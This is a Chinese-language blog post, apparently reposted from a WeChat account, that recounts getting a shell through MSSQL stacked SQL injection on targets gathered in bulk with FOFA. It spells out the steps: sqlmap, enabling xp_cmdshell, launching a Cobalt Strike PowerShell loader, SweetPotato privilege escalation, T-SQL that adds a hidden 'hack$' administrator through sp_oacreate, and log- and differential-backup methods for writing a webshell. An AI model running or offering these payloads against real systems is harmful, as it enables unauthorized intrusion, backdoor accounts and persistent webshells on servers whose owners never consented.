记一次堆叠注入拿shell的总结
2022-8-31 09:1:43 Author: 潇湘信安(查看原文) 阅读量:16 收藏
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

文章来源:奇安信攻防社区([email protected]

原文地址:https://forum.butian.net/share/517

0x01 前言

菜鸡第一次实战中碰到mssql的堆叠注入,大佬们轻喷。本来对堆叠注入没啥了解,这次正巧碰到mssql的堆叠注入,正好加强一下对堆叠注入的理解。

0x02 堆叠注入

因为在sql查询语句中, 分号“;”代表查询语句的结束,所以在执行sql语句结尾分号的后面,再加一条sql语句,就造成了堆叠注入。

这种情况很像联合查询,他们的区别就在于联合查询执行的语句是有限的,只能用来执行查询语句,而堆叠注入可以执行任意语句。

菜鸡不会审计php代码,这里就不贴sql语句的源码了。

0x03 渗透过程

先fofa批量找一下目标

前台的页面,首先怼一波弱口令

其实有几个是可以弱口令直接进后台的,但是后台没有任何的getshell点

那就只能在后台的登录窗口试一试有没有注入了,抓包测试一下

发现有注入点,直接上sqlmap一把梭,直接出了mssql 数据库,而且是堆叠注入。

这里想直接 --os-shell,想起来堆叠注入后面的语句是没有回显的,再换个思路。

ping 下 dnslog 看看是否可以直接执行命令,看来是可以执行命令的

再换个思路,尝试用xp_cmdshell,手工打开xp_cmdshell ,发现函数没有被禁用 ,可以执行命令

EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

尝试直接注入cs的powershell上线,好家伙,直接上线 ,看来函数没有被禁用

EXEC master..xp_cmdshell’免杀powershell命令’

甜土豆提权到system

连xp_cmdshell命令都没有禁用,想来也不会有什么杀软。

首先看了一下进程,emmm 那么多powershell进程......没有啥玩的必要了。可以尝试溯源一波,下篇文章发。

也没有内网,收工。

0x03 总结

这里这么顺利是因为没有杀软,命令也都没有拦截禁用,下面说一下如果xp_cmdshell被禁用该怎么办。
1. sp_configure函数
开启sp_configure函数的命令
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'Ole Automation Procedures', 1;  RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'show advanced options', 0;

执行系统命令,注意没有回显,下面的命令添加一个影子用户并加入管理员组

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user hack$ [email protected] /add';declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators [email protected]$ /add';
还有其他的函数,这里就不一一列举了。

注:很多情况上面两个函数并不能执行(存在杀软),mssql数据库可以用以下两个方法。

2. log备份写shell

前提条件:

数据库存在注入用户具有读写权限,一般至少DBO权限有网站的具体路径站库不分离
而且这种方法备份出的马子体积很小,备份成功的可能性很大。
利用步骤:
1.修改数据库为还原模式(恢复模式):;alter database 库名 set RECOVERY FULL –-2.建表和字段;create table orange(a image)--3.备份数据库;backup log 数据库名 to disk = ‘c:\www\0[email protected]with init –4.往表中写入一句话;insert into orange(a) values (0x...)--    //值要进行hex进制转换下5.利用log备份到web的物理路径;backup log 数据库名 to disk = 'c:\www\[email protected]' with init--6.删除表;Drop table orange--

3. 差异备份写shell

概念:备份自上一次完全备份之后有变化的数据。差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,也即备份后不标记为已备份文件。换言之,不清除存档属性。

用人话说就是:第二次备份的时候,与上一次完全备份的时候作对比,把不同的内容备份下来,所以只要插入我们的一句话木马,再备份一下,一句话就会被写到数据库中。

前提条件:
有网站具体路径有可写权限(dbo权限以上)站库不分离
利用步骤:
1.备份数据库;backup database 数据库名 to disk = 'C:\www\\...' with init --2.创建表格%';create table orange(a image) --3.写入webshell%';insert into orange(a) values (0xxxxx) --4.进行差异备份%';backup log 数据库名 to disk = 'C:\www\orange.asp'  WITH DIFFERENTIAL,FORMAT;--5.删除表;Drop table orange--

这些都是理论,实战中可能被各种过滤,还需要修改payload进行具体绕过。

ps:第一次发文章,有啥不对的师傅们可以指出来,一起学习(求轻喷)

关 注 有 礼

关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包

 还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247497939&idx=1&sn=a854dad9ed961adfe2a5c37e421bd34f&chksm=cfa55cc0f8d2d5d65dbc8aad263bea862ffb504865df57c5b69da502050e62afca17d1516f06#rd
如有侵权请联系:admin#unsafe.sh